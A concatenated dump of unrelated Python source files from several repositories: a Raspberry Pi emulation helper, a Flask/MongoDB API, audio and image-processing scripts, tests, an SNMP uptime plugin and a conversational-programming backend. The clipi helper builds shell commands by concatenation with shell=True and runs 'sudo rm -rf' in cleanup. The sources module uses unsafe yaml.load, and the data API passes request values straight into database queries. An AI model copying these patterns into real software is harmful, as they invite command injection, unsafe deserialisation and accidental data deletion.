if execute is None:
cmd = 'python3 ' + clipi_path + 'clipi.py '
else:
cmd = 'python3 ' + clipi_path + 'clipi.py ' + str(execute)
print(cmd)
proc = subprocess.Popen(cmd, shell=True)
print('re-executed clipi! ' +
'\n - @ pid ' + str(proc.pid))
@classmethod
def cleanup(cls):
# removes as admin from shell to avoid a wonky super python user xD
subprocess.Popen('sudo rm -rf image .pi', shell=True).wait()
print()
for x in range(3):
print('...\n')
sleep(.1)
print('complete. \n\n')
"""
Network & bridging functions have not been implemented yet
"""
@staticmethod
def get_network_depends():
if platform == 'darwin':
print('cannot install network bridge depends on mac OSX')
return 0
else:
print('make sure /network is ready to install....')
subprocess.Popen('sudo chmod u+x network/apt_net_depends.sh', shell=True).wait()
print('installing.....')
subprocess.Popen('./network/apt_net_depends.sh', shell=True).wait()
sleep(.1)
print('done.')
@staticmethod
def new_mac():
oui_bits = [0x52, 0x54, 0x00]
for x in range(256):
mac = oui_bits + [
random.randint(0x00, 0xff),
random.randint(0x00, 0xff),
random.randint(0x00, 0xff)]
return ':'.join(["%02x" % x for x in mac])
@staticmethod
def check_bridge():
CLIPINET = "read CLIPINET <<< $(ip -o link | awk '$2 != " + '"lo:"' + " {print $2}')"
if platform == 'darwin':
print('bridge networking not available for mac OSX')
quit()
else:
print('checking bridge network.....')
subprocess.Popen(CLIPINET, shell=True).wait()
subprocess.Popen('sudo chmod u+x network/up_bridge.sh', shell=True).wait()
sleep(.1)
subprocess.Popen('sudo ./network/up_bridge.sh', shell=True)
sleep(.1)
```
#### File: Jesssullivan/clipi/sources.py
```python
from common import *
import toml
import yaml
class sources(object):
default_configs = ['sources', 'etc/sources']
default_settings = ['default', 'etc/default']
default_types = ['.toml', '.yaml']
# provides an option to provide etc/sources.toml or add directly to dictionary
@classmethod
def get_source(cls):
for econfig in cls.default_configs:
for etype in cls.default_types:
try:
if os.path.isfile(econfig + etype):
if 'toml' in etype:
source = toml.load(econfig + etype)
else:
source = yaml.load(open(econfig + etype), Loader=yaml.Loader)
return source
except:
pass
else:
print("couldn't find default source toml or yaml, FYI")
# catch all if sources.toml doesn't exist:
source = {
'stretch_lite': 'http://downloads.raspberrypi.org/raspbian_lite/images/raspbian_lite-2018-11-15/2018-11-13'
'-raspbian-stretch-lite.zip',
'stretch_desktop': 'http://downloads.raspberrypi.org/raspbian/images/raspbian-2019-04-09/2019-04-08-raspbian'
'-stretch.zip',
'octoprint': 'https://octopi.octoprint.org/latest',
}
return source
@staticmethod
def has_conf():
# soften argument / no argument
try:
if '.toml' in sys.argv[1]:
return True
if '.yaml' in sys.argv[1]:
return True
except:
return False
@classmethod
def load_args(cls):
if sources.has_conf():
source = toml.load(sys.argv[1])
return source
else:
for econfig in cls.default_settings:
for etype in cls.default_types:
try:
if os.path.isfile(econfig + etype):
if 'toml' in etype:
source = toml.load(econfig + etype)
else:
source = yaml.load(open(econfig + etype), Loader=yaml.Loader)
return source
except:
pass
@staticmethod
def do_arg(arg, default):
xargs = sources.load_args()
try:
k = xargs[arg]
return k
except:
return default
```
|
{
"source": "Jesssullivan/MerlinAI-Interpreters",
"score": 3
}
|
#### File: main/datadb/models.py
```python
from flask import current_app as app
from ..tools import tools
from datetime import datetime
from flask import Flask, request, json, Response
from pymongo import MongoClient
import json
class DataAPI:
def __init__(self, data):
self.client = MongoClient("mongodb://127.0.0.1:27017/")
database = data['***']
collection = data['**']
cursor = self.client[database]
self.collection = cursor[collection]
self.data = data
def read(self):
print('Reading Data')
documents = self.collection.find()
output = [{item: data[item] for item in data if item != '_id'} for data in documents]
return output
def write(self):
print('Writing Data')
# load request:
_request = request.json
print(_request)
self.collection.insert(_request)
return tools.JsonResp(_request, 200)
def update(self):
print('Updating Data')
filt = self.data['Filter']
updated_data = {"$set": self.data['DataToBeUpdated']}
response = self.collection.update_one(filt, updated_data)
output = {'Status': 'Successfully Updated' if response.modified_count > 0 else "Nothing was updated."}
return output
def delete(self, data):
print('Deleting Data')
filt = data['Document']
response = self.collection.delete_one(filt)
output = {'Status': 'Successfully Deleted' if response.deleted_count > 0 else "Document not found."}
return output
class Asset:
def __init__(self):
self.defaults = {
"url": "",
"audio": "",
"src": "",
"attribution": ""
}
@staticmethod
def add_id_event():
_add_json = []
# load request:
_request = request.json
# insert event:
_ = app.db.eventdb.insert(_request)
return tools.JsonResp(_add_json, 200)
@staticmethod
def delete_id_event():
_del_json = {}
# load request:
_request = request.json
for id_event in _request:
_del_json.update(id_event)
# delete events:
_ = app.db.eventdb.delete_many(_del_json)
return tools.JsonResp(_del_json, 200)
@staticmethod
def list():
_raw_data = app.db.eventdb.find()
_docs = list(_raw_data)
return json.dumps(_docs)
@staticmethod
def add_dummy():
_event = {
"id": tools.randID(),
"ML_id": tools.randStringNumbersOnly(8),
"username": tools.randUser(),
"media_source": 'https://example.com/wavfile.wav',
"bbox": tools.randBbox(),
"category": tools.randSpecies(),
"supercategory": "Bird",
"last_modified": datetime.today().isoformat()
}
_data = app.db.eventdb.insert(_event)
return tools.JsonResp(_data, 200)
@staticmethod
def query_events_dummy(req):
_request = req.form
# get key & value for query:
_key = _request['key']
_value = _request['value']
# query:
_output = app.db.eventdb.find({_key: _value})
_docs = list(_output)
return tools.JsonResp(_docs, 200)
```
#### File: interpreter/etc/tone.py
```python
import numpy as np
from scipy.io.wavfile import write
from sys import argv
from os.path import abspath
# Generate .wav file from the command line
#
# testing out the accuracy of fft in Swift
#
# @ github.com/Jesssullivan/tmpUI
default_msg = str("no args specified, using defaults \n " +
" - you can specify duration in seconds & frequency in Hz like so: \n " +
" ` python3 tone.py 5 440 ` ")
def generate_sine_wav(frequency=440, length=5):
# stick with 44100 as sample rate:
_sample_rate = 44100
# parse any arguments passed from the shell:
try:
num_args = len(argv)
        if num_args == 2:  # argv[0] is the script name, so one extra arg is the duration
            length = int(argv[1])
            print(length)
        elif num_args > 2:  # two extra args: duration then frequency
            length = int(argv[1])
            frequency = int(argv[2])
            print(argv[2])
# no args, use defaults:
except:
print(default_msg)
# give the wav file a name:
file_name = "tone_" + str(length) + "_" + str(frequency) + ".wav"
print("...Creating file `" + file_name + "` ")
# generate a file:
file = np.linspace(0, length, _sample_rate * length)
# set frequency in Hz:
output_array = np.sin(frequency * 2 * np.pi * file)
# write out the .wav file:
write(file_name, _sample_rate, output_array)
# tell everyone about it:
print("...Generated file: \n " +
str(abspath(file_name)) +
"\n:)")
if __name__ == "__main__":
try:
generate_sine_wav()
except KeyboardInterrupt:
print("...Create .wav file aborted.")
quit()
```
|
{
"source": "JessterB/agora-data-tools",
"score": 3
}
|
#### File: agora-data-tools/tests/test_utils.py
```python
import pytest
from agoradatatools.etl import utils
from synapseclient import Synapse
file_object = {
"id": "syn25838546",
"format": "table",
"final_filename": "teams",
"provenance": [],
"destination": "syn25871921"
}
def test_login():
assert type(utils._login_to_synapse()) is Synapse
def test_yaml():
# tests if a valid file renders a list
assert type(utils._get_config()) is list
    # tests that a bad config file raises SystemExit
with pytest.raises(SystemExit) as err:
utils._get_config(config_path="./tests/test_assets/bad_config.yaml")
assert err.type == SystemExit
assert err.value.code == 9
with pytest.raises(SystemExit) as err:
utils._get_config(config_path="./tests/test_assets/bad_config.yam")
assert err.type == SystemExit
assert err.value.code == 2
if __name__ == "__main__":
pytest.main()
```
|
{
"source": "Jesstin127/tugas-pertemuan-12",
"score": 4
}
|
#### File: Jesstin127/tugas-pertemuan-12/tugas-pertemuan-12.py
```python
kata = ['', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine',]
def num(n:int):
if n < 10 :
return kata[n]
elif n >= 1_000_000_000:
return num(n//1_000_000_000)+ ' billion '+ num(n%1_000_000_000)
elif n >= 1_000_000:
return num(n//1_000_000)+' million ' + num(n%1_000_000)
elif n>=1_000:
return num(n//1000) + ' thousand ' + num(n%1000)
elif n>=100:
return num(n//100)+ ' hundred ' + num(n%100)
elif n>=20:
if n//10 == 2:
return 'twenty ' + num(n%10)
elif n//10 == 3:
return 'thirty ' + num(n%10)
elif n//10 == 4:
return 'forty ' + num(n%10)
elif n//10 == 5:
return 'fifty ' + num(n%10)
else :
return num(n//10)+('ty 'if (n//10)!=8 else 'y ') + num(n%10)
else :
if n==10:
return 'ten'
elif n==11:
return 'eleven'
elif n==12:
return 'twelve'
elif n==13:
return 'thirteen'
        elif n==15:
            return 'fifteen'
        elif n==18:
            return 'eighteen'
        else :
            return num(n%10) + 'teen'
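# A few example conversions produced by num() (a quick sketch; note a trailing
# space is left when the remainder is zero, e.g. num(20) -> 'twenty '):
#   num(42)   -> 'forty two'
#   num(215)  -> 'two hundred fifteen'
#   num(1003) -> 'one thousand three'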
import os
while True:
os.system('cls')
print("NUMBERS CONVERTER INTO WORDS")
print("============================")
try:
bil=int(input("Number\t? "))
print(f"{bil:,} = {num(bil)}")
except:
print("INPUT MUST BE NUMBER !!!")
print()
print("Want to Convert Again [y/n] ? ",end='')
again=input()
print()
if again.lower() == 'n' :
break
```
|
{
"source": "jessux/centreon",
"score": 2
}
|
#### File: centreon/plugins/check_uptime.py
```python
import plac
import getopt
import sys
import re
from subprocess import Popen, PIPE
import datetime
SNMPGET_BIN = '/usr/bin/snmpget'
SNMP_ENGINE_OID = '.1.3.6.1.6.3.10.2.1.3.0'
SNMP_UPTIME_OID = '.1.3.6.1.2.1.1.3.0'
host=""
community=""
warning=0
critical=0
def get_uptime(host,community,warning,critical):
# first search the SNMP engine time OID
port = 161
status= 3
perfdata=""
message=""
method=""
mycode, stdout = snmpget(host, port, community, SNMP_ENGINE_OID)
match = re.search('INTEGER:\W*(\d+)\W*seconds',str(stdout))
if match:
uptime_sec = int(match.group(1))
method = 'engine'
else:
# no match, continue on to using the SysUpTime OID
mycode, stdout = snmpget(host, port, community, SNMP_UPTIME_OID)
#print stdout
        match = re.search('Timeticks:\W*\((\d+)\)\W*', str(stdout))
if match:
uptime_sec = int(match.group(1)) / 100
method = 'sysUptime'
else:
message= 'CRITICAL: Unable to determine uptime'
status = 2
if method != "":
if uptime_sec < critical:
message = "CRITICAL: Uptime less than "+str(datetime.timedelta(seconds=critical))+" : is currently "+str(datetime.timedelta(seconds=uptime_sec))+" (SNMP method: "+method+")"
status = 2
elif uptime_sec < int(warning):
message = 'WARNING: Uptime less than '+str(datetime.timedelta(seconds=warning))+': is currently '+str(datetime.timedelta(seconds=uptime_sec))+' (method: '+method+')'
status = 1
else:
message = 'UPTIME OK: '+str(datetime.timedelta(seconds=uptime_sec))+' (method: '+method+')'
status = 0
perfdata = "'uptime_sec'="+str(datetime.timedelta(seconds=uptime_sec))+" seconds"
#print(message,perfdata,status)
return message,perfdata,status
def snmpget(host, port, community, oid):
snmpe = Popen([SNMPGET_BIN,'-v','2c','-c',community,host + ':' + str(port),oid], stdout=PIPE)
sout, serr = snmpe.communicate()
return (snmpe.returncode, sout)
def main(argv):
opts,args= getopt.getopt(argv,"hH:C:w:c:",["help","host","community","warning","critical"])
global host,community,warning,critical
for option,value in opts:
if option in ("-h","--help"):
sys.exit(0)
elif option in ("-H","--host"):
host=value
elif option in ("-C","--community"):
community=value
elif option in ("-w","--warning"):
warning=int(value)
elif option in ("-c","--critical"):
critical=int(value)
if __name__ == '__main__':
argv = sys.argv[1:]
main(argv)
message,perfdata,status = get_uptime(host,community,warning,critical)
print(message + "|" + perfdata)
sys.exit(status)
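# Example invocation (host and community string below are hypothetical):
#   ./check_uptime.py -H 192.0.2.10 -C public -w 86400 -c 3600
# prints a Nagios-style "message|perfdata" line and exits with the computed status code.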
# snmp engine
# .1.3.6.1.6.3.10.2.1.3.0
# sysUptime
# .1.3.6.1.2.1.1.3.0
```
|
{
"source": "jessvb/3d_world_procedural_generation",
"score": 3
}
|
#### File: 3d_world_procedural_generation/useful_scripts/prepDataset.py
```python
import os
import tensorflow as tf
import random
import numpy as np
import matplotlib.pyplot as plt
# uncomment for inline for the notebook:
# %matplotlib inline
import pickle
# enter the directory where the training images are:
TRAIN_DIR = 'train/'
IMAGE_SIZE = 512
train_image_file_names = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)]
# to decode a single png img:
# graph = tf.Graph()
# with graph.as_default():
# file_name = tf.placeholder(dtype=tf.string)
# file1 = tf.read_file(file_name)
# image = tf.image.decode_png(file1)
# with tf.Session(graph=graph) as session:
# tf.global_variables_initializer().run()
# image_vector = session.run(image, feed_dict={
# file_name: train_image_file_names[1]})
# print(image_vector)
# session.close()
# method to decode many png images:
def decode_image(image_file_names, resize_func=None):
images = []
graph = tf.Graph()
with graph.as_default():
file_name = tf.placeholder(dtype=tf.string)
file1 = tf.read_file(file_name)
image = tf.image.decode_png(file1)
# , channels=3) <-- use three channels for rgb pictures
k = tf.placeholder(tf.int32)
tf_rot_img = tf.image.rot90(image, k=k)
# im_rot = tf.placeholder(tf.float32, shape=(IMAGE_SIZE, IMAGE_SIZE, 3))
tf_flip_img = tf.image.flip_left_right(tf_rot_img)
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
for i in range(len(image_file_names)):
for j in range(4): # rotation at 0, 90, 180, 270 degrees
rotated_img = session.run(tf_rot_img, feed_dict={
file_name: image_file_names[i], k: j})
images.append(rotated_img)
flipped_img = session.run(
tf_flip_img, feed_dict={
file_name: image_file_names[i], k: j})
images.append(flipped_img)
if (i+1) % 1000 == 0:
print('Images processed: ', i+1)
session.close()
return images
train_images = decode_image(train_image_file_names)
print('shape train: ', np.shape(train_images))
# Let's see some of the images
# for i in range(10,14):
# plt.imshow(train_images[i].reshape([IMAGE_SIZE,IMAGE_SIZE]), cmap=plt.get_cmap('gray'))
# plt.show()
# for rgb images:
# for i in range(10,20):
# plt.imshow(train_images[i])
# plt.show()
def create_batch(data, label, batch_size):
i = 0
while i*batch_size <= len(data):
with open(label + '_' + str(i) + '.pickle', 'wb') as handle:
content = data[(i * batch_size):((i+1) * batch_size)]
pickle.dump(content, handle)
print('Saved', label, 'part #' + str(i),
'with', len(content), 'entries.')
i += 1
# Create one hot encoding for labels
# labels = [[1., 0.] if 'dog' in name else [0., 1.] for name in train_image_file_names]
# these are all real images, so let's encode them all with 1's
labels = [[1., 0.] for name in train_image_file_names]
# TO EXPORT DATA WHEN RUNNING LOCALLY - UNCOMMENT THESE LINES
# a batch with 5000 images has a size of around 3.5 GB
# create_batch(labels, 'pickled/', np.shape(train_images)[0])
create_batch(train_images, 'pickled/', np.shape(train_images)[0])
print('done creating dataset')
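# To read a saved batch back later (a sketch; the file name follows the
# label + '_' + index + '.pickle' pattern used by create_batch above):
# with open('pickled/_0.pickle', 'rb') as handle:
#     images = pickle.load(handle)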
```
|
{
"source": "jessvb/convo",
"score": 3
}
|
#### File: backend/server/db_manage.py
```python
import json
from app import logger, db
from datetime import datetime
from helpers import convert_to_object, convert_to_dict
class User(db.Model):
'''User model that is associated with Convo clients'''
id = db.Column(db.Integer, primary_key=True)
# Server ID of connected client
sid = db.Column(db.String(120), unique=True, nullable=False)
# Date when created
created_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
# Date when user last connected
connected_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
class Program(db.Model):
'''Program model that is currently representing procedures in Convo'''
id = db.Column(db.Integer, primary_key=True)
sid = db.Column(db.String(120), db.ForeignKey('user.sid'), nullable=False)
# Name of procedure
name = db.Column(db.String(80), nullable=False)
# JSON-encoded string of the procedure object
procedure = db.Column(db.Text, nullable=True)
# Date when created
created_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
# Date when updated
updated_on = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)
def get_or_create_user(client):
'''Gets user based on client if exists, else creates a new user'''
user = User.query.filter_by(sid=client.id).first()
if user is None:
user = User(sid=client.id)
db.session.add(user)
else:
user.connected_on = datetime.utcnow()
db.session.commit()
return user
def from_db_program(program):
'''Convert Program DB model to a Procedure'''
return json.loads(program.procedure, object_hook=convert_to_object)
def get_procedures(sid):
'''Get all procedures of a client based on their sid'''
programs = Program.query.filter_by(sid=sid).all()
if not programs:
return {}
procedures = [(program.name, from_db_program(program)) for program in programs]
return dict(procedures)
def add_or_update_procedure(sid, procedure):
'''Add or update an existing procedure based on client's sid and procedure's id'''
encoded = json.dumps(procedure, default=convert_to_dict)
program = Program.query.filter_by(sid=sid, name=procedure.name).first()
if program is None:
program = Program(sid=sid, name=procedure.name, procedure=encoded)
db.session.add(program)
else:
program.procedure = encoded
program.updated_on = datetime.utcnow()
db.session.commit()
procedure.id = program.id
return program
def remove_procedure(sid, procedure):
'''Removes a procedure from database'''
program = Program.query.filter_by(sid=sid, name=procedure.name).first()
if not program:
return
db.session.delete(program)
db.session.commit()
```
#### File: backend/server/dialog.py
```python
from nlu import SemanticNLU
from rasa_nlu import RasaNLU
from question import QuestionAnswer
from models import *
from goals import *
from error import *
from helpers import *
from app import logger
state_machine = {
"home": {
"create_procedure": "creating",
"execute": "executing",
"edit": "editing",
"connect_intent": "editing"
},
"creating": {
"complete": "home"
},
"editing": {
"add_step": "editing_action",
"change_step": "editing_action",
"complete": "home"
},
"executing": {
"finish": "home"
},
"editing_action": {
"complete": "editing"
}
}
allowed_goals = {
"home": [HomeGoal, GetInputGoal],
"creating": [ActionGoal, GetActionsGoal, GetConditionGoal, GetInputGoal],
"editing": [StepGoal, GetInputGoal, ActionGoal, GetActionsGoal, GetConditionGoal],
"editing_action": [ActionGoal, GetActionsGoal, GetConditionGoal, GetInputGoal],
"executing": [GetUserInputGoal, GetInputGoal]
}
class DialogManager(object):
"""Represents a dialog manager for a client"""
def __init__(self, sid, port="5005", procedures={}):
self.sid = sid
self.port = port
self.context = DialogContext(sid, port, procedures)
self.qa = QuestionAnswer(self.context)
self.nlu = SemanticNLU(self.context)
self.rasa = RasaNLU(self.context)
def reset(self, context=None):
"""Resets the context either entirely or to a snapshot of another context"""
if context is not None:
# If a context is provided, set the context to the provided context
self.context = context
self.qa = QuestionAnswer(context)
self.nlu = SemanticNLU(context)
self.rasa = RasaNLU(context)
else:
self.context.reset()
logger.debug(f"[{self.sid}] Resetting the entire conversation.")
return "Conversation has been reset. What do you want to do first?"
@property
def immediate_goal(self):
"""Returns the immediate, lowest-level current goal"""
current = self.context.current_goal
while current and current.todos:
current = current.todos[-1]
return current
def current_goal(self):
"""Returns the current high-level goal, may contain other goals in its todos"""
return self.context.current_goal
def handle_message(self, message, isUnconstrained):
"""Handle messages by the client"""
self.context.add_message(message)
# Handle message indicating a reset
response = self.handle_reset(message)
if response is not None:
logger.debug(f"[{self.sid}] User resetted.")
return response
# If message indicates client needed help, return appropriate response
response = self.handle_help(message)
if response is not None:
logger.debug(f"[{self.sid}] User needed help.")
return response
# Handle messages received by server during program execution
if self.context.state == "executing":
logger.debug(f"[{self.sid}] Program is currently executing.")
return self.handle_execution(message)
# Handle message indicating a canceling of the immediate goal
response = self.handle_cancel(message)
if response is not None:
logger.debug(f"[{self.sid}] User canceled.")
return response
# Handle message that may be question and answer it
response = self.handle_question(message)
if response is not None:
logger.debug(f"[{self.sid}] User asked a question.")
return response
# If none of the above, parse the message for either a goal or slot-filling value
response = self.handle_parse(message, isUnconstrained)
if response is not None:
return response
return self.handle_goal()
def handle_reset(self, message):
"""Check for reset"""
if message.lower() == "reset":
return self.reset()
def handle_help(self, message):
"""Check for help"""
if message.lower() in ["help", "i need help"]:
return "Raise your hand and help will be on the way!"
def handle_execution(self, message):
"""Check if DM in stage of execution"""
execution = self.context.execution
if message.lower() in ["stop", "cancel"]:
# Stop execution if user commands it
execution.finish("Procedure has been stopped.")
elif execution.input_needed:
# If execution was paused to ask for user input, continue the execution with provided input
execution.run(message)
else:
# Do not allow any other action besides the two cases above
return "Procedure is still executing."
return
def handle_cancel(self, message):
"""
Check for cancellation
If cancel, cancels the lowest-level goal that is not a "Get Input" or "Get Condition" goal
For example, if the goal chain is "Add Step" -> "Create Variable" -> "Get Input", it will cancel "Create Variable"
"""
if message.lower() == "cancel":
previous = None
current = self.context.current_goal
while current and current.todos:
if isinstance(current.todos[-1], GetInputGoal) or isinstance(current.todos[-1], GetConditionGoal):
break
previous, current = current, current.todos[-1]
logger.debug(f"[{self.context.sid}] Canceling the current goal: {current}")
current.cancel()
if current is None:
return "You are not doing anything right now. What do you want to do?"
elif previous is None:
assert self.context.state == "home"
self.context.goals.pop()
return "Canceled! What do you want to do now?"
else:
previous.todos.pop()
return f"Canceled! {previous.message}"
def handle_question(self, message):
"""Check if message is a question and answer if it is"""
if QuestionAnswer.is_question(message):
logger.debug(f"Answering a potential question: {message}")
answer = self.qa.answer(message)
if answer is not None:
logger.debug(f"Question can be answered with: {answer}")
return answer
def handle_parse(self, message, isUnconstrained):
"""Parses the message"""
try:
if isUnconstrained:
goal = self.rasa.parse_message(message)
if goal is None:
goal = self.nlu.parse_message(message)
else:
goal = self.nlu.parse_message(message)
self.context.parsed = goal
except InvalidStateError as e:
response = "I can't do this right now"
if isinstance(e.goal, ActionGoal):
logger.debug(f"[{self.sid}] Invalid state to do action because currently not creating or editing a procedure.")
response += " because I am currently not creating or editing a procedure"
elif isinstance(e.goal, StepGoal):
if e.state == "editing_action":
logger.debug(f"[{self.sid}] Invalid state to do action because currently adding or editing an action.")
response += " because I am currently adding or editing an action"
else:
logger.debug(f"[{self.sid}] Invalid state to do action because currently not editing a procedure.")
response += " because I am currently not editing a procedure"
elif isinstance(e.goal, HomeGoal):
if e.state == "creating":
logger.debug(f"[{self.sid}] Invalid state to do action because currently creating a procedure.")
response += " because I am currently creating a procedure. You can stop by saying \"done\""
elif e.state == "editing":
logger.debug(f"[{self.sid}] Invalid state to do action because currently editing a procedure.")
response += " because I am currently editing a procedure. You can stop by saying \"done\""
elif e.state == "editing_action":
logger.debug(f"[{self.sid}] Invalid state to do action because adding or editing an action.")
response += " because I am currently adding or editing an action. Finish editing then you can stop by saying \"done\""
else:
logger.debug(f"[{self.sid}] Invalid state to do action.")
return f"{response}."
def handle_goal(self):
"""
Advances and updates the context based on the current received message
"""
if self.current_goal() is None:
# If a current goal does not exist at the moment current message is received
goal = self.context.parsed
if goal is None or not isinstance(goal, BaseGoal):
logger.debug(f"[{self.sid}] Did not understand utterance: {self.context.current_message}")
response = "I didn't understand what you were saying. Please try again."
elif goal.error is not None:
# If parsed goal has an error, respond to client
response = goal.error
elif goal.is_complete:
# If parsed goal can already be completed, complete the goal and respond to client
response = goal.complete()
else:
# Add parsed goal to the current context and respond to client about the goal
response = goal.message
self.context.add_goal(goal)
else:
# If there is a current goal, advance the current goal
goal = self.current_goal()
goal.advance()
if goal.error is not None:
# If current goal has an error, remove the goal and respond to client
response = goal.error
self.context.goals.pop()
elif goal.is_complete:
# If current goal can be completed, complete the goal and respond to client
response = goal.complete()
self.context.goals.pop()
else:
response = goal.message
return response
def handle_train(self, intents):
"""
Prompts the user to connect or create procedures for each intent that was trained.
"""
logger.debug(f"[{self.sid}] Finished training the following intents: {intents}.")
return f"You've finished training the intents: {intents}! Please connect it to the procedure you want to execute when the intent is recognized by saying \"connect the intent [intent name] to the procedure [procedure name]\"."
class DialogContext(object):
"""
Contains context and information needed to process messages and maintain conversations
More specifically, contains the classes, procedures, intents (and entities), state, conversation, goals
and execution/editing subcontexts for the client
"""
def __init__(self, sid, port, procedures={}):
self.sid = sid
self.rasa_port = port
self.classes = {}
self.procedures = procedures
self.execution = None
self.intents = {} # maps intent name to a list of required entities
self.intent_to_procedure = {} # maps intent name to a procedure that it is linked to
self.entities = {} # maps entities to their respective values, if given
self.reset()
@property
def current_message(self):
"""Retrieves the latest message of the conversation"""
return self.conversation[-1].lower() if self.conversation else None
@property
def current_goal(self):
"""Retrives the current top-level goal"""
return self.goals[-1] if self.goals else None
def reset(self):
"""Resets the context"""
if self.execution is not None:
self.execution.finish()
self.state = "home"
self.conversation = []
self.goals = []
self.current = None
self.execution = None
self.edit = None
def add_message(self, message):
self.conversation.append(message)
def add_goal(self, goal):
self.goals.append(goal)
def add_class(self, klass):
self.classes[klass.name] = klass
def add_procedure(self, procedure):
self.procedures[procedure.name] = procedure
def add_intent(self, intent, entities):
self.intents[intent] = entities
for entity in entities:
self.entities[entity] = None
def add_entity(self, entity, value):
self.entities[entity] = value
def get_class(self, name):
return self.classes.get(name)
def validate_goal(self, goal):
"""Check if goal is allowed in the current state of the context"""
allowed = any([type(goal) == goaltype or isinstance(goal, goaltype) for goaltype in allowed_goals[self.state]])
if not allowed:
raise InvalidStateError(goal, self.state)
def transition(self, action):
"""Transition state given the action"""
self.state = state_machine[self.state][str(action)]
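# Illustration of the state machine above (a quick sketch, not part of the runtime flow):
#   state_machine["home"]["create_procedure"]  # -> "creating"
#   state_machine["creating"]["complete"]      # -> "home"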
```
#### File: server/goals/loop.py
```python
from app import logger
from goals import *
from models import *
class LoopActionGoal(ActionGoal):
"""Goal for adding a loop action"""
def __init__(self, context, loop=None, condition=None, action=None):
super().__init__(context)
self.loop_actions = []
self.todos = [GetLoopActionsGoal(self.context, self.loop_actions)]
self.setattr("action", action)
self.setattr("condition", condition)
self.setattr("loop", loop)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(LoopAction(self.loop, self.condition, self.loop_actions))
return super().complete()
def advance(self):
logger.debug(f"Advancing {self.__class__.__name__}...")
self._message = None
if self.todos:
todo = self.todos.pop()
todo.advance()
if todo.error:
if isinstance(todo, GetConditionGoal):
self.error = todo.error
else:
self._message = todo.error
return
if todo.is_complete:
todo.complete()
else:
self.todos.append(todo)
def setattr(self, attr, value):
if attr == "action" and value:
setattr(value, "actions", self.loop_actions)
if value.error:
self.error = value.error
elif value.is_complete:
value.complete()
else:
self.todos[0].todos.append(value)
return
elif attr == "condition":
if value is None:
self.todos.append(GetConditionGoal(self.context, self))
elif isinstance(value, UntilStopCondition):
self.loop = "until"
self.condition = value
elif value.variable.variable not in self.variables:
self.error = f"Variable {value.variable.variable} used in the condition hasn't been created yet. Please try again or create the variable first."
elif isinstance(value.value, ValueOf) and value.value.variable not in self.variables:
self.error = f"Variable {value.value.variable} used in the condition hasn't been created yet. Please try again or create the variable first."
elif isinstance(value, ComparisonCondition):
if isinstance(value.value, str):
if value.value in self.variables:
value.value = ValueOf(value.value)
self.condition = value
else:
self.error = f"The value {value.value} is not a number, so I cannot compare. Please try again."
else:
self.condition = value
else:
self.condition = value
return
elif attr == "loop":
assert value is not None
self.loop = value
return
setattr(self, attr, value)
```
#### File: server/goals/say.py
```python
from models import *
from goals import *
class SayActionGoal(ActionGoal):
"""Goal for adding a say action"""
def __init__(self, context, say_phrase=None):
super().__init__(context)
self.setattr("phrase", say_phrase)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SayAction(self.phrase))
return super().complete()
def setattr(self, attr, value):
if attr == "phrase":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What do you want me to say?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value.variable}, hasn't been created. Try using an existing variable if you want to try again."
return
self.phrase = value
else:
self.phrase = value
return
setattr(self, attr, value)
```
#### File: server/goals/variable.py
```python
from models import *
from goals import *
class CreateVariableActionGoal(ActionGoal):
"""Goal for adding a create variable action"""
def __init__(self, context, variable_name=None, variable_value=None, prepend=False):
super().__init__(context)
self.prepend = prepend
self.setattr("value", variable_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
if self.prepend:
self.actions.insert(0, CreateVariableAction(self.name, self.value))
else:
self.actions.append(CreateVariableAction(self.name, self.value))
self.variables.add(self.name)
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What do you want to call the variable?"))
elif value in self.variables:
self.error = f"The name, {value}, has already been used. Try creating a variable with another name."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What should be the initial value?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value}, hasn't been created yet. Try setting it to the value of an existing variable."
else:
self.value = value
else:
self.value = value
return
setattr(self, attr, value)
class SetVariableActionGoal(ActionGoal):
"""Goal for adding a set variable action"""
def __init__(self, context, variable_name=None, variable_value=None):
super().__init__(context)
self.setattr("value", variable_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(SetVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to set?"))
elif value not in self.variables:
self.error = f"Variable, {value}, hasn't been created, so we can't set it yet. You can create it by saying, \"create a variable called {value}.\""
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to set the variable to?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable, {value}, hasn't been created yet. Try setting it to the value of an existing variable."
else:
self.value = value
else:
self.value = value
return
setattr(self, attr, value)
class AddToVariableActionGoal(ActionGoal):
"""Goal for adding a add to variable action"""
def __init__(self, context, variable_name=None, add_value=None):
super().__init__(context)
self.setattr("value", add_value)
self.setattr("name", variable_name)
def complete(self):
assert hasattr(self, "actions")
self.actions.append(AddToVariableAction(self.name, self.value))
return super().complete()
def setattr(self, attr, value):
if attr == "name":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What variable do you want to add to?"))
elif value not in self.variables:
self.error = f"The variable, {value}, hasn't been created so there is nothing to add to. Try creating the variable first."
else:
self.name = value
return
elif attr == "value":
if value is None:
self.todos.append(GetInputGoal(self.context, self, attr, f"What value do you want to add to the variable?"))
elif isinstance(value, ValueOf):
if value.variable not in self.variables:
self.error = f"Variable {value} does not exist. Try setting it to the value of an existing variable."
else:
self.value = value
elif isinstance(value, str):
